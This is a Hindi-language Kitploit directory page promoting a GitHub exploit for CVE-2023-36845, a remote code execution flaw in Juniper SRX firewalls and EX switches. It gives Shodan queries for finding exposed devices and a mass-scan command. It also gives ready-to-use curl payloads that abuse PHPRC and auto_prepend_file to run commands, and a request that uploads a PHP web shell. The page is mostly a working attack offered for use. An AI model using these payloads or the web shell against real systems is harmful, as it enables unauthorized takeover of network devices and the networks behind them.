Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36845 — जुनिपर फ़ायरवॉल CVE-2023-36845 - RCE | Kitploit
उपकरण/GitHubGitHub/kljunowsky/cve-2023-36845
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubkljunowsky/cve-2023-36845

CVE-2023-36845

जुनिपर फ़ायरवॉल CVE-2023-36845 - RCE

रिपॉजिटरी देखें
55132 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-36845

विवरण

CVE-2023-36845 एक उल्लेखनीय PHP वातावरण चर हेरफेर भेद्यता है जो Juniper SRX फ़ायरवॉल और EX स्विच को प्रभावित करती है। जबकि Juniper ने इस भेद्यता को मध्यम गंभीरता के रूप में वर्गीकृत किया है, इस लेख में हम समझाएंगे कि कैसे इस एकल भेद्यता का उपयोग दूरस्थ, अप्रमाणित कोड निष्पादन के लिए किया जा सकता है।

खोज - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
छवि
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
छवि

उपयोग 🛠

पता लगाना

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

विकल्प 1

किसी भी प्रोटोकॉल रैपर का auto_prepend_file के साथ उपयोग संभव है। इस ऑपरेशन के लिए सबसे उपयुक्त विकल्प data:// प्रोटोकॉल है, जो "द्वितीयक फ़ाइल" को इनलाइन प्रदान करने की अनुमति देता है। यहाँ इस शोषण का एक परिष्कृत प्रतिनिधित्व है, जो data:// योजना के भीतर एम्बेडेड <? phpinfo(); ?> को निष्पादित करता है:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

whoami कमांड निष्पादित करें

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

विकल्प 2

एक फ़ाइल अपलोड करें

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

पैरामीटर 🧰

पैरामीटरविवरणप्रकार
--file / -fइनपुट लक्ष्य फ़ाइलफ़ाइल
-oआउटपुट फ़ाइलफ़ाइल

मुझसे संपर्क करें 📇

LinkedIn - Milan Jovic

टूल डाउनलोड करें